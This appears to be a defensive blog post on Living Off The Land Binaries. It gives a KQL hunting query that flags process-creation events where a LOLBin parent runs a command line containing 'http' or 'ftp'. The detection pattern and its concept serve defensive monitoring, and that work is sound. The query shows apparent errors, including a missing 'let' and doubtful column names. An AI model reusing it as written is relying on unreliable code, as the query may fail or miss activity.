LOLBins (Living Off The Land Binaries) are legitimate programs or tools that are commonly used by attackers to gain access to and compromise a system. These programs are often built into an operating system or are widely available as part of a software development kit (SDK) or other application. They are called "Living Off The Land" because they use tools that are already present on the system, rather than introducing new malware or other malicious code.
Attackers use LOLBins because they can be difficult to detect and block, as they are not typically flagged as malicious by antivirus software or other security controls. They can also be used to bypass security controls and gain access to sensitive data or systems, or to execute code on a compromised system. The Mitre Att&ck Technique is T1218.
To detect and track the use of LOLBins on a system, we can use the Kusto Query Language (KQL). KQL is a powerful query language that is used to analyze data in Azure Sentinel and other data sources.
One way to hunt for LOLBins using KQL is to use a query like the following which I built:
Bin = externaldata(Binary: string) [@"https://raw.githubusercontent.com/sonnyakhere/LOLBAS_to_CSV/main/lolbas.csv"] with (format="csv", ignoreFirstRecord=True);
let ioc = dynamic(["http", "ftp"]);
SecurityEvent
| where EventID == 4688
| where TimeGenerated between ( ago(1d) .. now() )
// Looking to exclude system initiated activity
| where SubjectUserName !endswith "$"
| where SubjectUserName != "SYSTEM"
| where ParentProcessName has_any (Bin)
// Looking to only include details of those that have command line activities matching 1 or more of the defined IOCs
| where ProcessCommandLine has_any (ioc)
| project TimeGenerated, SubjectMachineName, SubjectUserName, ParentProcessName, Process, ProcessCommandLine
| sort by TimeGenerated asc
This query begins by using the externaldata
operator to retrieve a list of known LOLBins from a CSV file hosted on GitHub. The CSV file was scrapped from the popular LOLBAS Project. It then defines a list of indicators of compromise (IOCs) as a dynamic array of strings.
Next, the query filters the SecurityEvent
table to include only events with the EventID
of 4688
, which corresponds to process creation events. It then filters the results to include only events that occurred within the past 24 hours.
The query then uses the where
clause to exclude events initiated by the system, by filtering out events with a SubjectUserName
that ends with "$"
or is equal to "SYSTEM"
. It also filters the results to include only events where the ParentProcessName
has any value that appears in the list of known LOLBins.
Finally, the query filters the results to include only events where the ProcessCommandLine
field contains any of the defined IOCs, and projects the resulting events to include the time the event was generated, the subject machine name, the subject user name, the parent process name, the process name, and the process command line. The results are then sorted by the time the event was generated.
Conclusion
They can be difficult to detect and block, as they are not typically flagged as malicious by antivirus software or other security controls.
To detect and track the use of LOLBins on a system, we can use the Kusto Query Language (KQL). The Qeury can also be found on my Github. By running this query regularly and monitoring the results, we can stay vigilant against attacks involving LOLBins and take steps to protect our systems.
I hope you found this helpful. Thank you and see you on the next one.